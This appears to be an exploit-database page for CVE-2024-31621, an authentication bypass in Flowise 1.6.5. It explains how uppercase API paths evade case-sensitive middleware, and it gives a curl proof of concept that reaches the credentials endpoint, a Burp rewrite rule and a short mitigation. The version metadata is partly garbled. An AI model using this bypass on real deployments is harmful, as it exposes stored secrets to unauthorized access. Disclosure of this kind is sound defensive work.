Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Flowise 1.6.5 - Authentication Bypass - exploit.company
header-logo
Suggest Exploit
vendor:
Flowise
by:
Maerifat Majeed
6.1
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Flowise
Affected Version From: 1.6.2005
Affected Version To: 1.6.2005
Patch Exists: NO
Related CWE: CVE-2024-31621
CPE: a:flowiseai:flowise:1.6.5
Metasploit:
Other Scripts:
Platforms Tested: mac-os
2024

Flowise 1.6.5 – Authentication Bypass

Flowise version 1.6.5 and below is susceptible to an authentication bypass vulnerability. By modifying the endpoint paths to uppercase, such as /API/V1 instead of /api/v1, an attacker can bypass the authentication process. This issue is due to the lack of case sensitivity in the code snippet responsible for authentication middleware.

Mitigation:

To mitigate this vulnerability, developers should ensure that the authentication logic is case-sensitive when validating endpoint paths. Additionally, regular security testing and code reviews can help identify and address such flaws.
Source

Exploit-DB raw data:

# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

The flowise version <= 1.6.5 is vulnerable to authentication bypass
vulnerability.
The code snippet

this.app.use((req, res, next) => {
>                 if (req.url.includes('/api/v1/')) {
>                     whitelistURLs.some((url) => req.url.includes(url)) ?
> next() : basicAuthMiddleware(req, res, next)
>                 } else next()
>             })


puts authentication middleware for all the endpoints with path /api/v1
except a few whitelisted endpoints. But the code does check for the case
sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the
endpoints to uppercase like /API/V1 can bypass the authentication.

*POC:*
curl http://localhost:3000/Api/v1/credentials
For seamless authentication bypass. Use burpsuite feature Match and replace
rules in proxy settings. Add rule Request first line api/v1 ==> API/V1

Navigation

Suggest Exploit

Services By CQR

cqrsecured